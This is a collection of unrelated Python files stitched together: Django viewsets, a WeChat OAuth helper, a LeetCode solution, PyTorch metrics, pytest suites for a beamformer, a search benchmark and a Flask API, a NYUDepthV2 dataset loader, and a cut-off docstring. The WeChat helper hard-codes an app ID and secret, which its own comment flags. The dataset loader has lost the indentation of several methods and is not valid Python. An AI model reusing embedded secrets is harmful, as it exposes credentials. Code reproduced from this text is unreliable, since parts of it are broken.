    def get_serializer_class(self):
        """
        Ensures that the contents of a PUT, POST or PATCH request do not contain the serialized versions of nested
        objects.
        :return: either the no-nested-serialization serializer or the default one depending on request method
        """
        if self.request.method in ["PUT", "POST", "PATCH"]:
            return ProjectSerializerForUpdateRequests
        else:
            return super().get_serializer_class()
    def create(self, request, *args, **kwargs):
        """
        Ensures that the response to a POST request is parsed using the elaborate (nested serialization included)
        serialization instead of the one used for the request itself.
        :param request: HTTP request sent by user
        :return: HTTP response from server
        """
        serializer = ProjectSerializer(data=request.data)
        serializer.is_valid(raise_exception=True)
        self.perform_create(serializer)
        headers = self.get_success_headers(serializer.data)
        return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
    def update(self, request, *args, **kwargs):
        """
        Ensures that the response to a PUT/PATCH request is parsed using the elaborate (nested serialization included)
        serialization instead of the one used for the request itself.
        :param request: HTTP request sent by user
        :return: HTTP response from server
        """
        partial = kwargs.pop('partial', False)
        instance = self.get_object()
        serializer = self.get_serializer(instance, data=request.data, partial=partial)
        serializer.is_valid(raise_exception=True)
        self.perform_update(serializer)
        # NOTE(review): the request payload is re-validated against the nested
        # ProjectSerializer AFTER the update has been persisted; if this second
        # validation fails the client receives a 400 even though the update
        # already happened. RiskView.update serializes the instance without
        # re-validating — confirm which behaviour is intended.
        return_serializer = ProjectSerializer(instance, data=request.data, partial=partial)
        return_serializer.is_valid(raise_exception=True)
        if getattr(instance, '_prefetched_objects_cache', None):
            # If 'prefetch_related' has been applied to a queryset, we need to
            # forcibly invalidate the prefetch cache on the instance.
            instance._prefetched_objects_cache = {}
        return Response(return_serializer.data)
class RiskView(ModelViewSet):
    """Viewset exposing CRUD operations for Risk models."""

    serializer_class = RiskSerializer
    queryset = Risk.objects.all()
    permission_classes = [IsAuthenticated]

    def get_serializer_class(self):
        """
        Use the flat (no nested serialization) serializer for write
        requests and fall back to the default serializer otherwise.
        """
        if self.request.method in ("PUT", "POST", "PATCH"):
            return RiskSerializerForUpdateRequests
        return super().get_serializer_class()

    def create(self, request, *args, **kwargs):
        """
        Validate and save the new Risk, then respond with the full
        (nested) serialization of the created object.
        """
        write_serializer = RiskSerializer(data=request.data)
        write_serializer.is_valid(raise_exception=True)
        self.perform_create(write_serializer)
        success_headers = self.get_success_headers(write_serializer.data)
        return Response(
            write_serializer.data,
            status=status.HTTP_201_CREATED,
            headers=success_headers,
        )

    def update(self, request, *args, **kwargs):
        """
        Apply the update through the flat serializer, then respond with
        the full (nested) serialization of the updated instance.
        """
        partial = kwargs.pop('partial', False)
        instance = self.get_object()
        write_serializer = self.get_serializer(instance, data=request.data, partial=partial)
        write_serializer.is_valid(raise_exception=True)
        self.perform_update(write_serializer)
        read_serializer = RiskSerializer(instance)
        if getattr(instance, '_prefetched_objects_cache', None):
            # Drop any stale 'prefetch_related' cache after the update.
            instance._prefetched_objects_cache = {}
        return Response(read_serializer.data)
|
import urllib.request
import json
class ab_User():
    """Helper for the WeChat OAuth2 web-login flow (token exchange and
    user-info lookup)."""

    def __init__(self):
        # SECURITY: credentials are hard-coded in source; they should be moved
        # to configuration/environment instead of being committed to code.
        self.appId = 'wxff3cfebbdcbcd135'
        self.appScrect = 'b9774614f15c56e6e42884ff84ee5168'

    def getOpenId(self, code):
        """Exchange an OAuth authorization code for the access-token/openid
        payload and return it as a dict."""
        # fixed: stray leading space in the URL removed
        getUrl = 'https://api.weixin.qq.com/sns/oauth2/access_token?appid=%s&secret=%s&code=%s&grant_type=authorization_code' % (
            self.appId, self.appScrect, code)
        # use a context manager so the HTTP response is closed (the original
        # leaked the connection)
        with urllib.request.urlopen(getUrl) as resp:
            return json.loads(resp.read().decode('utf-8'))

    def getUserInfo(self, access_token, openId):
        """Fetch the WeChat user profile for openId and return it as a dict."""
        getUrl = 'https://api.weixin.qq.com/sns/userinfo?access_token=%s&openid=%s&lang=zh_CN' % (
            access_token, openId)
        with urllib.request.urlopen(getUrl) as resp:
            return json.loads(resp.read().decode('utf-8'))

    def getWage(self, id):
        # not implemented yet
        pass
|
"""
498. Diagonal Traverse
Given a matrix of M x N elements (M rows, N columns), return all elements of the matrix in diagonal order as shown in the below image.
Example:
Input:
[
[ 1, 2, 3 ],
[ 4, 5, 6 ],
[ 7, 8, 9 ]
]
Output: [1,2,4,7,5,3,6,8,9]
Note:
The total number of elements of the given matrix will not exceed 10,000.
"""
class Solution(object):
    def findDiagonalOrder(self, matrix):
        """
        :type matrix: List[List[int]]
        :rtype: List[int]

        Bucket elements by anti-diagonal (constant row+col). Even-sum
        diagonals are emitted bottom-to-top (up-right), odd-sum diagonals
        top-to-bottom (down-left) — the LeetCode 498 zig-zag order.
        """
        if len(matrix) == 0:
            return []
        buckets = {}
        for r, row_vals in enumerate(matrix):
            for c, val in enumerate(row_vals):
                buckets.setdefault(r + c, []).append(val)
        order = []
        for s in range(len(matrix) + len(matrix[0]) - 1):
            diagonal = buckets.get(s, [])
            # even diagonals travel up-right, i.e. reversed row-major order
            order.extend(reversed(diagonal) if s % 2 == 0 else diagonal)
        return order
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from tqdm import tqdm
def evaluate(model, data_loader, metrics, device):
    """Run *model* over *data_loader* and return dataset-averaged metrics.

    *metrics* maps names to callables (y_hat, y) -> scalar tensor; each
    batch's value is weighted by batch size so the result is a per-sample
    mean. The model is switched to eval mode if it was training.
    """
    if model.training:
        model.eval()
    summary = dict.fromkeys(metrics, 0)
    for step, batch in tqdm(enumerate(data_loader), desc='steps', total=len(data_loader)):
        inputs, targets = map(lambda t: t.to(device), batch)
        with torch.no_grad():
            preds, _ = model(inputs)
            # accumulate batch-size-weighted sums (model returns (logits, extra))
            for name in metrics:
                summary[name] += metrics[name](preds, targets).item() * targets.size()[0]
    # the original used a for/else here; the else always ran (no break),
    # so a plain post-loop normalization is equivalent
    for name in metrics:
        summary[name] /= len(data_loader.dataset)
    return summary
def acc(yhat, y):
    """Classification accuracy: fraction of argmax(yhat) equal to y."""
    with torch.no_grad():
        predicted = yhat.argmax(dim=1)
        return (predicted == y).float().mean()
def entropy(probs):
    """Sum of p * log(p) over the last axis.

    NOTE(review): this is the NEGATIVE of Shannon entropy (no leading minus
    sign). No caller is visible here — confirm the sign convention before
    changing it.
    """
    return (probs * probs.log()).sum(dim=-1)
class LSR(nn.Module):
    """Label-smoothing regularized cross-entropy loss.

    Mixes ordinary cross-entropy with a uniform-prior regularizer:
    (1 - epsilon) * CE(yhat, y) + epsilon * E_uniform[-log_softmax(yhat)],
    averaged over the batch.
    """

    def __init__(self, epsilon=.1, num_classes=162):
        super(LSR, self).__init__()
        self._epsilon = epsilon
        self._num_classes = num_classes

    def forward(self, yhat, y):
        # uniform prior over the classes, broadcast to yhat's shape
        uniform = torch.ones_like(yhat) / self._num_classes
        ce = F.cross_entropy(yhat, y, reduction='none')
        smooth = (-F.log_softmax(yhat, dim=-1) * uniform).sum(-1)
        return ((1 - self._epsilon) * ce + self._epsilon * smooth).mean()
|
import pytest
from cognigraph.nodes.processors import Beamformer
from cognigraph.nodes.sources import FileSource
from cognigraph.nodes.tests.prepare_tests_data import (info, # noqa
fwd_model_path,
data_path)
import numpy as np
@pytest.fixture(scope='function') # noqa
def beamformer(info, fwd_model_path, data_path): # noqa
    """Adaptive Beamformer node wired to a FileSource parent that
    supplies one sample of random data on all channels."""
    is_adaptive = True
    beamformer = Beamformer(fwd_path=fwd_model_path,
                            is_adaptive=is_adaptive)
    beamformer.mne_info = info
    N_SEN = len(info['ch_names'])
    # random input vector, one value per sensor
    beamformer.input = np.random.rand(N_SEN)
    parent = FileSource(data_path)
    parent.output = np.random.rand(info['nchan'], 1)
    parent.mne_info = info
    beamformer.parent = parent
    return beamformer
@pytest.fixture # noqa
def beamformer_default(info): # noqa
    """Beamformer built with all-default parameters (no forward model),
    still attached to a FileSource parent with random output."""
    beamformer_default = Beamformer()
    parent = FileSource()
    parent.mne_info = info
    parent.output = np.random.rand(info['nchan'], 1)
    beamformer_default.parent = parent
    return beamformer_default
def test_defaults(beamformer_default):
    """A default-constructed Beamformer has no forward model path or mne_info."""
    assert beamformer_default.fwd_path is None
    assert beamformer_default.mne_info is None
def test_initialize(beamformer):
    """Initialization must build the spatial filters and keep mne_info set."""
    beamformer.initialize()
    assert hasattr(beamformer, '_filters')
    assert beamformer.mne_info is not None
def test_reg_change(beamformer):
    """
    Change regularization parameter and see if filters changed but
    covariance matrix didn't reset to default
    """
    beamformer.initialize()
    # -------- modify covariance so it's not equal to initial -------- #
    nchans = beamformer._upstream_mne_info['nchan']
    ntimes = 100
    beamformer._update_covariance_matrix(np.random.rand(nchans, ntimes))
    # --------------------------------------------------------------- #
    data_cov_old = beamformer._data_cov.data
    filters_old = beamformer._filters.copy()
    beamformer.reg = 5
    beamformer.reset()
    # new regularization -> new filters, but the accumulated covariance survives
    assert not np.array_equal(filters_old, beamformer._filters)
    assert np.array_equal(beamformer._data_cov.data, data_cov_old)
def test_adaptiveness_change(beamformer):
    """
    Change is_adaptive and see if reinitialization happens
    """
    beamformer.is_adaptive = True
    beamformer.initialize()
    data_cov_init = beamformer._data_cov.data
    # -------- modify covariance so it's not equal to initial -------- #
    nchans = beamformer._upstream_mne_info['nchan']
    ntimes = 100
    beamformer._update_covariance_matrix(np.random.rand(nchans, ntimes))
    # --------------------------------------------------------------- #
    filters = beamformer._filters.copy()
    beamformer.is_adaptive = False
    beamformer.update()
    # switching adaptiveness rebuilds the filters and resets the covariance
    # back to its initialization-time value
    assert not np.array_equal(filters, beamformer._filters)
    assert np.array_equal(beamformer._data_cov.data, data_cov_init)
def test_input_hist_inval_triggers_reinit_for_adaptive_beamformer(beamformer):
    """Input-history invalidation must rebuild the filters (here deliberately
    clobbered to None) while restoring the initialization-time covariance."""
    beamformer.parent.initialize()
    beamformer.initialize()
    data_cov_init = beamformer._data_cov.data
    # -------- modify covariance so it's not equal to initial -------- #
    nchans = beamformer._upstream_mne_info['nchan']
    ntimes = 100
    beamformer._update_covariance_matrix(np.random.rand(nchans, ntimes))
    # --------------------------------------------------------------- #
    filters_old = beamformer._filters.copy()
    beamformer._filters = None  # mess up the filters
    beamformer.on_input_history_invalidation()
    assert not np.array_equal(filters_old, beamformer._filters)
    assert np.array_equal(beamformer._data_cov.data, data_cov_init)
def test_update(beamformer):
    """Smoke test: an update cycle runs without raising."""
    # NOTE(review): this calls the private _initialize/_update, while the
    # other tests use the public initialize()/update() — confirm intended.
    beamformer._initialize()
    beamformer._update()
def test_check_value(beamformer):
    """Negative regularization values must be rejected with ValueError."""
    with pytest.raises(ValueError):
        beamformer.reg = -1
|
from pathlib import Path
import pytest
import pybmoore
@pytest.mark.parametrize(
    "filename,terms",
    [
        (
            "tests/data/br_constitution.txt",
            ["Deus", "Brasil"],
        ),
        (
            "tests/data/br_constitution.txt",
            ["Supremo Tribunal Federal", "Emenda Constitucional"],
        ),
    ],
)
def test_search_multiple_terms(filename, terms, benchmark):
    """Benchmark pybmoore.search with a list of terms over a large corpus."""
    benchmark(pybmoore.search, terms, Path(filename).read_text())
@pytest.mark.parametrize(
    "filename,term",
    [
        ("tests/data/br_constitution.txt", "Lei nº"),
        ("tests/data/br_constitution.txt", "Supremo Tribunal Federal"),
        ("tests/data/us_constitution.txt", "Congress"),
        ("tests/data/us_constitution.txt", "Congress of the United States"),
    ],
)
def test_search_single_term(filename, term, benchmark):
    """Benchmark pybmoore.search with a single term over a large corpus."""
    benchmark(pybmoore.search, term, Path(filename).read_text())
@pytest.mark.parametrize(
    "pattern",
    [
        ("algorithm"),
        ("string-searching"),
        ("19"),
        ("The Boyer–Moore"),
        ("algorithm preprocess"),
    ],
)
def test_search(pattern, benchmark):
    """Benchmark pybmoore.search for several patterns over an in-memory text."""
    # Wikipedia-style paragraph used as a small fixed corpus.
    TEXT = "In computer science, the Boyer–Moore string-search algorithm is an efficient string-searching algorithm that is the standard benchmark for practical string-search literature.[1] It was developed by Robert S. Boyer and J Strother Moore in 1977.[2] The original paper contained static tables for computing the pattern shifts without an explanation of how to produce them. The algorithm for producing the tables was published in a follow-on paper; this paper contained errors which were later corrected by Wojciech Rytter in 1980.[3][4] The algorithm preprocesses the string being searched for (the pattern), but not the string being searched in (the text). It is thus well-suited for applications in which the pattern is much shorter than the text or where it persists across multiple searches. The Boyer–Moore algorithm uses information gathered during the preprocess step to skip sections of the text, resulting in a lower constant factor than many other string search algorithms. In general, the algorithm runs faster as the pattern length increases. The key features of the algorithm are to match on the tail of the pattern rather than the head, and to skip along the text in jumps of multiple characters rather than searching every single character in the text."
    benchmark(pybmoore.search, pattern, TEXT)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Unit tests about articles' API"""
from logging import DEBUG
import pytest
from marucat_app import create_app
@pytest.fixture
def client():
    """Flask test client backed by the app's test database configuration."""
    app = create_app(level=DEBUG, db='test')
    app.testing = True
    return app.test_client()
def test_get_list(client):
    """GET /articles: list fetching with size/offset query params,
    default values, invalid values (400) and wrong method (405)."""
    def perform_get_list(input_val, expect_val, code=200, tags=None):
        """test template
        :param input_val: inputted values (size, offset)
        :param expect_val: the expected result (size, offset)
        :param code: expected status code
        :param tags: tags
        """
        # get inputted size and offset
        size, offset = input_val if input_val else (None, None)
        # make request with query params
        # example: /articles/list?size=10&offset=1
        requested_url = '/articles{}'.format(
            '?{}{}{}'.format(
                'size={}'.format(size) if size != '' else '',
                '&' if size and offset else '',
                'offset={}'.format(offset) if offset != '' else ''
            ) if size or offset else ''
        )
        # perform request
        r = client.get(requested_url)
        print(requested_url, r.status_code)
        # check return code
        assert code == r.status_code
        if 200 == code:
            # get expected size and offset
            e_size, e_offset = expect_val
            # check Content-Type
            assert 'application/json' == r.content_type
            # check data (the test backend echoes the parsed params back)
            fake_data = {
                'test_only': 'TESTING',
                'size': e_size,
                'offset': e_offset,
                'tags': tags
            }
            assert fake_data == r.get_json()[1]
        elif 400 == code:
            assert r.data
            assert r.get_json()['error'] is not None
        else:
            raise AssertionError(
                'Unexpected status code:{}'.format(r.status_code)
            )
    # 200 below
    # default values (size, offset)
    default_val = (10, 0)
    # default params
    perform_get_list(None, default_val)
    # specific params
    perform_get_list((55, 999), (55, 999))
    # error checking
    # no val provided to size
    perform_get_list(('', 998), (10, 998))
    # no val provided to offset
    perform_get_list((1098, ''), (1098, 0))
    # no val provided to both
    perform_get_list(('', ''), default_val)
    # 400 below
    # invalid val provided
    perform_get_list(('abc', 192), None, 400)
    perform_get_list((111, 'acb'), None, 400)
    perform_get_list((-1, 192), None, 400)
    perform_get_list((111, -99), None, 400)
    perform_get_list((0, 192), None, 400)
    perform_get_list((111, 0), None, 400)
    # other errors
    # 405 method not allowed
    rv = client.post('/articles?size=1&offset=2')
    assert 405 == rv.status_code
def test_get_content(client):
    """GET /articles/<id>: content fetching, not-found ids, ids with
    special characters (404) and wrong method (405)."""
    def perform_get_content(article_id, code=200):
        """Test template"""
        url = '/articles/{}'.format(article_id)
        r = client.get(url)
        print(url, r.status_code)
        assert code == r.status_code
        if 404 == code:
            # empty ids and ids containing '/' never reach the handler
            # (Flask routing), so no JSON error body is produced
            if article_id == '' or '/' in article_id:
                assert not r.data
            else:
                assert r.data
                assert r.get_json()['error'] is not None
        else:
            r_data = r.get_json()
            assert article_id == r_data['aid']
    # 200 below
    # /article/aidT1234
    perform_get_content('T1234')
    # 404 without error message feedback below
    # /article/aid
    # perform_get_content('', 404)
    # 404 with error message feedback below
    # /article/aidTEST_NOT_FOUND
    perform_get_content('TEST_NOT_FOUND', 404)
    # special characters
    perform_get_content('/', 404)
    perform_get_content('abc/ ', 404)
    perform_get_content('abc/123', 404)
    perform_get_content('asd&123', 404)
    perform_get_content('asd+123', 404)
    perform_get_content('asd_123', 404)
    perform_get_content('asd-123', 404)
    perform_get_content('asd"123', 404)
    perform_get_content('asd\'123', 404)
    # 405 method not allowed
    rv = client.patch('/articles/aidTest')
    assert 405 == rv.status_code
def test_get_comments(client):
    """GET /articles/<id>/comments: pagination defaults, bad article ids
    (404), bad query params (400) and wrong method (405)."""
    def perform_get_comments(aid, inputted, expect, code=200):
        """Test template
        :param aid: article id
        :param inputted: inputted values
        :param expect: expected result
        :param code: status code
        """
        size, page = None, None
        if inputted is not None:
            size, page = inputted
        url = '/articles/{}/comments{}'.format(
            aid if aid is not None else '',
            '?{}{}{}'.format(
                'size={}'.format(size) if size is not None else '',
                '&' if size is not None and page is not None else '',
                'offset={}'.format(page) if page is not None else ''
            ) if size is not None or page is not None else ''
        )
        r = client.get(url)
        print(url, r.status_code)
        assert code == r.status_code
        if code == 200:
            # get expected size and page
            e_size, e_page = expect
            # check Content-Type
            assert 'application/json' == r.content_type
            # check data (the test backend echoes the parsed params back)
            data = {
                'test_only_aid': aid,
                'size': e_size,
                'offset': e_page
            }
            assert data == r.get_json()[1]
        elif code == 400 or code == 404:
            # check Content-Type; ids that break routing produce no body
            if aid != '' and '/' not in aid:
                assert 'application/json' == r.content_type
                assert r.get_json()['error'] is not None
            else:
                assert not r.data
        else:
            raise AssertionError(
                'Unexpected status code:{}'.format(r.status_code)
            )
    # default values
    perform_get_comments('T123', None, (10, 0))
    perform_get_comments('DF789', (99, None), (99, 0))
    perform_get_comments('090909', (None, 12), (10, 12))
    # normally test
    perform_get_comments('paa', (123, 456), (123, 456))
    perform_get_comments('0998100029999123', (11, 12), (11, 12))
    # bad parameters
    perform_get_comments('', None, None, 404)
    perform_get_comments('/', None, None, 404)
    perform_get_comments('asd/123', (1, 2), None, 404)
    perform_get_comments('asd&123', (3, 4), None, 404)
    perform_get_comments('asd+123', None, None, 404)
    perform_get_comments('asd-123', None, None, 404)
    perform_get_comments('asd_123', (5, 6), None, 404)
    perform_get_comments('asd\'123', (7, 8), None, 404)
    perform_get_comments('asd"123', None, None, 404)
    # bad query parameters
    # perform_get_comments('T123', (0, 0), None, 400)
    # perform_get_comments('T123', (0, 1), None, 400)
    # perform_get_comments('T123', (1, 0), None, 400)
    perform_get_comments('T123', (-1, -99), None, 400)
    perform_get_comments('T123', (1, -1), None, 400)
    perform_get_comments('T123', (-91, 11), None, 400)
    # method not allowed
    rv = client.put('/articles/aidT123/comments')
    assert 405 == rv.status_code
def test_post_comments(client):
    """POST /articles/<id>/comments: successful creation (201), invalid
    article ids (404) and incomplete payloads (400)."""
    def perform_post_comments(article_id, data, code=201):
        url = '/articles/{}/comments'.format(article_id)
        r = client.post(url, json=data)
        print(url, r.status_code)
        assert code == r.status_code
        if code == 404 or code == 400:
            assert 'application/json' == r.content_type
            assert r.get_json()['error'] is not None
    # a complete, valid comment payload
    normally_data = {
        'from': 'Richard',
        'body': 'Ok!',
        'timestamp': 1529658047.974455
    }
    # normally
    perform_post_comments('1234', normally_data)
    # invalid article ID
    perform_post_comments('123$123', normally_data, 404)
    perform_post_comments('123"123', normally_data, 404)
    perform_post_comments('123+123', normally_data, 404)
    perform_post_comments('123-123', normally_data, 404)
    perform_post_comments("123'123", normally_data, 404)
    # invalid post data (each is missing one required key)
    perform_post_comments('test1234', {'from': 'a', 'body': 'b'}, 400)
    perform_post_comments('test1234', {'timestamp': 'a', 'body': 'b'}, 400)
    perform_post_comments('test1234', {'timestamp': 'a', 'from': 'b'}, 400)
    # reply to ok
    perform_post_comments('asd123123', {**normally_data, 'reply_to': '12412'})
def test_delete_comment(client):
    """DELETE /articles/<aid>/comments/<cid>: success (200) and special
    characters in either id (404)."""
    def perform_delete_comment(article_id, comment_id, code=200):
        url = '/articles/{}/comments/{}'.format(
            article_id, comment_id
        )
        r = client.delete(url)
        print(url, r.status_code)
        assert code == r.status_code
        if code == 404:
            assert 'application/json' == r.content_type
            assert r.get_json()['error'] is not None
    # normally
    perform_delete_comment('aid1234', 'cid1234')
    # bad article ID
    perform_delete_comment('aid+123', 'cid456', 404)
    perform_delete_comment('aid-123', 'cid456', 404)
    perform_delete_comment('aid*123', 'cid456', 404)
    perform_delete_comment(r'aid\123', 'cid456', 404)
    perform_delete_comment('aid"123', 'cid456', 404)
    perform_delete_comment('aid123%', 'cid456', 404)
    # perform_delete_comment('aid#123', 'cid456', 404)
    # perform_delete_comment('aid123#', 'cid456', 404)
    perform_delete_comment('aid@123', 'cid456', 404)
    perform_delete_comment('aid&123', 'cid456', 404)
    perform_delete_comment("aid'123", 'cid456', 404)
    # bad comment ID
    perform_delete_comment('aid1234', 'cid~123', 404)
    perform_delete_comment('aid1234', 'cid!123', 404)
    perform_delete_comment('aid1234', 'cid@123', 404)
    perform_delete_comment('aid1234', 'cid$123', 404)
    perform_delete_comment('aid1234', 'cid123%', 404)
    perform_delete_comment('aid1234', 'cid^123', 404)
    perform_delete_comment('aid1234', 'cid&123', 404)
    perform_delete_comment('aid1234', 'cid*123', 404)
    perform_delete_comment('aid1234', 'cid(123', 404)
    perform_delete_comment('aid1234', 'cid)123', 404)
    perform_delete_comment('aid1234', 'cid[123', 404)
    perform_delete_comment('aid1234', 'cid]123', 404)
|
# Copyright (c) 2018-2021, Texas Instruments
# All Rights Reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import h5py
import scipy.io
import sys
import glob
import random
import numpy as np
import cv2
import PIL
from colorama import Fore
from .. import utils
from .dataset_base import *
class NYUDepthV2(DatasetBase):
def __init__(self, num_classes=151, ignore_label=None, download=False, **kwargs):
super().__init__(num_classes=num_classes, **kwargs)
self.force_download = True if download == 'always' else False
assert 'path' in self.kwargs and 'split' in self.kwargs, 'path and split must be provided'
self.depth_label_scale = 256.0
path = self.kwargs['path']
split = kwargs['split']
if download:
self.download(path, split)
#
self.kwargs['num_frames'] = self.kwargs.get('num_frames', None)
self.name = "NYUDEPTHV2"
self.ignore_label = ignore_label
#self.label_dir_txt = os.path.join(self.kwargs['path'], 'objectInfo150.txt')
image_dir = os.path.join(self.kwargs['path'], self.kwargs['split'], 'images')
images_pattern = os.path.join(image_dir, '*.jpg')
images = glob.glob(images_pattern)
self.imgs = sorted(images)
labels_dir = os.path.join(self.kwargs['path'], self.kwargs['split'], 'annotations')
labels_pattern = os.path.join(labels_dir, '*.png')
labels = glob.glob(labels_pattern)
self.labels = sorted(labels)
assert len(self.imgs) == len(self.labels), 'mismatch in the number f images and labels'
self.num_frames = min(self.kwargs['num_frames'], len(self.imgs)) \
if (self.kwargs['num_frames'] is not None) else len(self.imgs)
    def download(self, path, split):
        """Download the labeled NYUDepthV2 .mat archive plus the train/val
        split file, and materialize them as train/val folders of JPEG images
        and uint16 depth PNGs under *path*.

        Skips everything when the expected folder layout already exists,
        unless force_download is set.
        """
        root = path
        out_folder = root
        train_images_folder = os.path.join(path, 'train', 'images')
        train_annotations_folder = os.path.join(path, 'train', 'annotations')
        val_images_folder = os.path.join(path, 'val', 'images')
        val_annotations_folder = os.path.join(path, 'val', 'annotations')
        if (not self.force_download) and os.path.exists(path) and os.path.exists(train_images_folder) and \
                os.path.exists(train_annotations_folder) and os.path.exists(val_images_folder) and \
                os.path.exists(val_annotations_folder):
            print(utils.log_color('\nINFO', 'dataset exists - will reuse', path))
            return
        #
        print(utils.log_color('\nINFO', 'downloading and preparing dataset', path + ' This may take some time.'))
        print(f'{Fore.YELLOW}'
              f'\nNYUDepthV2 Dataset:'
              f'\n    Indoor Segmentation and Support Inference from RGBD Images'
              f'\n        Silberman, N., Hoiem, D., Kohli, P., & Fergus, R. , European Conference on Computer Vision (ECCV), 2012. '
              f'\n    Visit the following urls to know more about NYUDepthV2 dataset: '
              f'\n        https://www.tensorflow.org/datasets/catalog/nyu_depth_v2'
              f'\n        https://cs.nyu.edu/~silberman/datasets/nyu_depth_v2.html '
              f'{Fore.RESET}\n')
        dataset_url = 'http://horatio.cs.nyu.edu/mit/silberman/nyu_depth_v2/nyu_depth_v2_labeled.mat'
        split_url = 'https://github.com/cleinc/bts/blob/master/utils/splits.mat?raw=true'
        root = root.rstrip('/')
        download_root = os.path.join(root, 'download')
        file_path = utils.download_file(dataset_url, root=download_root, force_download=self.force_download)
        split_path = utils.download_file(split_url, root=download_root, force_download=self.force_download)
        h5_file = h5py.File(file_path, 'r')
        # splits.mat holds 1-based image indices for train/test membership
        split = scipy.io.loadmat(split_path)
        os.makedirs(out_folder, exist_ok=True)
        os.makedirs(train_images_folder, exist_ok=True)
        os.makedirs(train_annotations_folder, exist_ok=True)
        os.makedirs(val_images_folder, exist_ok=True)
        os.makedirs(val_annotations_folder, exist_ok=True)
        test_images = set([int(x) for x in split["testNdxs"]])
        train_images = set([int(x) for x in split["trainNdxs"]])
        depths_raw = h5_file['rawDepths']
        images = h5_file['images']
        scenes = [u''.join(chr(c) for c in h5_file[obj_ref]) for obj_ref in h5_file['sceneTypes'][0]]
        for i, (image, scene, depth_raw) in enumerate(zip(images, scenes, depths_raw)):
            # arrays come out of the .mat transposed relative to image layout
            depth_raw = depth_raw.T
            image = image.T
            idx = int(i) + 1
            if idx in train_images:
                train_val = "train"
            else:
                assert idx in test_images, "index %d neither found in training set nor in test set" % idx
                train_val = "val"
            #folder = "%s/%s" % (out_folder, train_val)
            folder = os.path.join(out_folder, train_val)
            images_folder = os.path.join(folder, 'images')
            annotations_folder = os.path.join(folder, 'annotations')
            # if not os.path.exists(folder):
            #     os.makedirs(folder)
            # scale clipped raw depth into the uint16 PNG label encoding
            depth_raw = depth_raw.clip(0.0, 255.0 )
            img_depth = depth_raw * self.depth_label_scale
            img_depth_uint16 = img_depth.astype(np.uint16)
            cv2.imwrite("%s/%05d.png" % (annotations_folder, i), img_depth_uint16)
            # RGB -> BGR for cv2, and zero out a 7-pixel frame around the image
            image = image[:, :, ::-1]
            image_black_boundary = np.zeros((480, 640, 3), dtype=np.uint8)
            image_black_boundary[7:474, 7:632, :] = image[7:474, 7:632, :]
            cv2.imwrite("%s/%05d.jpg" % (images_folder, i), image_black_boundary)
        #
        print(utils.log_color('\nINFO', 'dataset ready', path))
        return
    def __len__(self):
        """Return the number of frames in this dataset split."""
        return self.num_frames
def __getitem__(self, idx, with_label=False):
if with_label:
image_file = self.imgs[idx]
label_file = self.labels[idx]
return image_file, label_file
else:
return self.imgs[idx]
#
    def __call__(self, predictions, **kwargs):
        """Alias for evaluate(), making the dataset object callable."""
        return self.evaluate(predictions, **kwargs)
def compute_scale_and_shift(self, prediction, gt, mask):
a_00 = np.sum(mask * prediction * prediction)
a_01 = np.sum(mask * prediction)
a_11 = np.sum(mask)
b_0 = np.sum(mask * prediction * gt)
b_1 = np.sum(mask * gt)
det = a_00 * a_11 - a_01 * a_01
if det <= 0:
return 0, 0
else:
x_0 = (a_11 * b_0 - a_01 * b_1) / det
x_1 = (-a_01 * b_0 + a_00 * b_1) / det
return x_0, x_1
def evaluate(self, predictions, threshold=1.25, depth_cap_max = 80, depth_cap_min = 1e-3, **kwargs):
disparity = kwargs.get('disparity')
scale_and_shift_needed = kwargs.get('scale_shift')
delta_1 = 0.0
num_frames = min(self.num_frames, len(predictions))
for n in range(num_frames):
image_file, label_file = self.__getitem__(n, with_label=True)
label_img = PIL.Image.open(label_file)
label_img = np.array(label_img, dtype=np.float32) / self.depth_label_scale
prediction = predictions[n]
if scale_and_shift_needed:
mask = label_img != 0
disp_label = np.zeros_like(label_img)
disp_label[mask] = 1.0 / label_img[mask]
if not disparity:
disp_prediction = np.zeros_like(prediction)
disp_prediction[prediction != 0] = 1.0 / prediction[prediction != 0]
else:
disp_prediction = prediction
scale, shift = self.compute_scale_and_shift(disp_prediction, disp_label, mask)
prediction = scale * disp_prediction + shift
prediction[prediction < 1 / depth_cap_max] = 1 / depth_cap_max
prediction[prediction > 1 / depth_cap_min] = 1 / depth_cap_min
mask = np.minimum(label_img, prediction) != 0
if disparity:
disp_pred = prediction
prediction = np.zeros_like(disp_pred)
prediction[mask] = 1.0 / disp_pred[mask]
delta = np.zeros_like(label_img, dtype=np.float32)
delta = np.maximum(
prediction[mask] / label_img[mask],
label_img[mask] / prediction[mask]
)
good_pixels_in_img = delta < threshold
delta_1 += good_pixels_in_img.sum() / mask.sum()
#
delta_1 /= (n + 1)
metric = {'accuracy_delta_1%': delta_1 * 100}
return metric |
"""
@author: David Lei
@since: 20/10/2017
Given two sorted lists, return a list of their intersection with no
duplicates with O(1) space and O(n) run time.
For example:
A[2,3,3,4,6,6,8] B[3,3,6,7,9]
should return [3, 6]
Approach:
